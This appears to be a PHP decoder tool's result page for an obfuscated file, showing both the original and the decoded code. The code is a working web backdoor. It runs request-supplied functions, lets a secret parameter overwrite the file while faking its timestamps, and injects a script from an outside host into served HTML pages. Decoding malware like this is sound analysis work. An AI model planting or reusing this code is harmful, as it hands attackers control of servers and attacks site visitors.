Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

iF( ($UPwsfKV=@${"\x5f\122E\121\125\x45ST"} ["Q\64J\x37\x36\x52\x4aM"])ANd(898656168 ))$UP..

Decoded Output download

<?  iF( ($UPwsfKV=@${"_REQUEST"} ["Q4J76RJM"])ANd(898656168	))$UPwsfKV	[1](	${$UPwsfKV[ 2]}[	0 ]	,	$UPwsfKV [ 3]($UPwsfKV	[4])); 
/*cut here;)*/if(isset($_REQUEST["qhqx8bfb331qe8qo"])){if(empty($_REQUEST["qhqx8bfb331qe8qo"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-LiteSpeed-Purge: *");if(function_exists("opcache_reset")){@opcache_reset();}if(function_exists("apc_clear_cache")){@apc_clear_cache();}$unz3x0=filemtime(__FILE__);$s17kk6=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["qhqx8bfb331qe8qo"]))));@touch(__FILE__,$unz3x0+1,$s17kk6+1);}die;}if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){function if17sg($unz3x0){return str_replace("</head>","<script type='text/javascript' async src='https://mzdr330z.cloudfire.quest/challenge.js'></script></head>",$unz3x0);}ob_start("if17sg");}/*cut here;)*/ ?>

Did this file decode correctly?

Original Code

iF( ($UPwsfKV=@${"\x5f\122E\121\125\x45ST"} ["Q\64J\x37\x36\x52\x4aM"])ANd(898656168	))$UPwsfKV	[1](	${$UPwsfKV[ 2]}[	0 ]	,	$UPwsfKV [ 3]($UPwsfKV	[4]));
/*cut here;)*/if(isset($_REQUEST["\x71\x68q\170\70\x62\146\142\x33\63\x31\x71e8qo"])){if(empty($_REQUEST["\x71\x68\x71\170\x38\x62\x66\142\x33\x331\x71e8q\157"])){echo bin2hex(gzdeflate(file_get_contents(__FILE__)));}else{header("X-\114i\164\145Sp\x65e\144-P\165rg\145\72\40\52");if(function_exists("o\x70\143ach\x65\x5fr\x65\x73\x65t")){@opcache_reset();}if(function_exists("\x61p\x63_\x63\154e\x61\162\x5f\143a\x63\150\145")){@apc_clear_cache();}$unz3x0=filemtime(__FILE__);$s17kk6=fileatime(__FILE__);echo strval(file_put_contents(__FILE__,gzinflate(pack("H\x2a",$_REQUEST["\x71\x68q\170\x38\142\x66\x62\x33\x33\61\161\x65\x38\x71\157"]))));@touch(__FILE__,$unz3x0+1,$s17kk6+1);}die;}if(isset($_SERVER["HT\x54P\137A\x43\x43EP\124"])&&(strpos($_SERVER["\110\124T\x50\137\101C\x43\x45P\x54"],"\x74\x65\170\x74\x2fh\x74m\154")!==false||$_SERVER["\x48\x54T\120\137A\103\103E\120\124"]==="*\x2f\52")){function if17sg($unz3x0){return str_replace("</h\x65\x61\x64\x3e","<\x73\143\162i\160t \x74\x79\160\x65=\47\164\145\170t\57\x6a\141\x76\x61sc\x72i\160\x74\x27\x20\x61\163\x79\156\x63\40s\x72c='\150t\164\x70\x73\x3a\57\57\155z\x64r\x3330z\56c\x6c\157ud\x66\x69re.\x71u\145s\x74/\143\x68\141\x6cle\156g\145.\152\x73\x27\x3e\74\57\x73\143\162\151\160\164>\x3c/\x68\x65\x61\x64>",$unz3x0);}ob_start("\x69f\61\x37s\147");}/*cut here;)*/

Function Calls

strpos 1

Variables

$UPwsfKV None

Stats

MD5 57bdc26af35d835cc6edbdcfd61b64ec
Eval Count 0
Decode Time 401 ms